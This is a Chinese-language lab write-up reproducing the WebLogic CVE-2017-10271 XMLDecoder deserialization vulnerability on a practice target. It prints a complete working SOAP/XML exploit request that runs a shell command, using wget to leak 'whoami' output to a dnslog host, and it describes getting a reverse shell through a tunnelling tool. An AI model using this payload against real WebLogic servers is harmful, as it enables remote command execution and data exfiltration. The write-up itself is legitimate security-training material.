[CVE-2017-10271]Weblogic--WLS Security反序列化漏洞复现

最新推荐文章于 2025-03-14 15:27:39 发布

原创最新推荐文章于 2025-03-14 15:27:39 发布 · 554 阅读

9 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全

文章目录

靶机地址
靶机说明
开启并访问靶机
POC
exp
反弹shell
后续查找flag过程略

靶机地址

网站地址 cyberstrikelab.com
靶机地址CVE-2017-10271

靶机说明

Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。

在这里插入图片描述

开启并访问靶机

在这里插入图片描述

POC

在访问地址后面补充 /wls-wsat/CoordinatorPortType 会跳转到如下页面，说明有漏洞
在这里插入图片描述

exp

两个核心：

默认的GET方法修改为POST方法
Content-Type: text/xml

另外，靶机没有 curl 不过有 wget ，可通过 wget + dnslog 信息外带

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: xxxxxx.cyberstrikelab.com:83
Content-Type: text/xml
Content-Length: 617

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget `whoami`.xxxxx.dnslog.cn
</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述

反弹shell

一开始反弹shell没有成功，网上查询资料，根据又菜又爱倒腾大佬文章提示，发现部分字符需要转换成实体编码；网上随便找的实体编码在线转换网站 HtmlEncode，反弹过程中使用了 cpolar 的内网穿透工具（免费的），顺利反弹到本地的kali电脑，顺利 getshell 。

利用在线网站将反弹 shell 的部分字符进行实体编码

在这里插入图片描述

后续查找flag过程略

参考资料以及工具网站：

cyberstrikelab靶机网站 https://www.cyberstrikelab.com/
又菜又爱倒腾大佬的《Weblogic XMLDecoder反序列化漏洞复现(CVE-2017-10271)》
反弹shell网站 https://www.revshells.com/
实体编码在线转换网站 https://www.convertstring.com/zh_CN/EncodeDecode/HtmlEncode
内网穿透工具 https://www.cpolar.com/
大表哥哟的 cpolar 使用教程 https://mp.weixin.qq.com/s/-yD7ymzdlegwcLugnL9FZw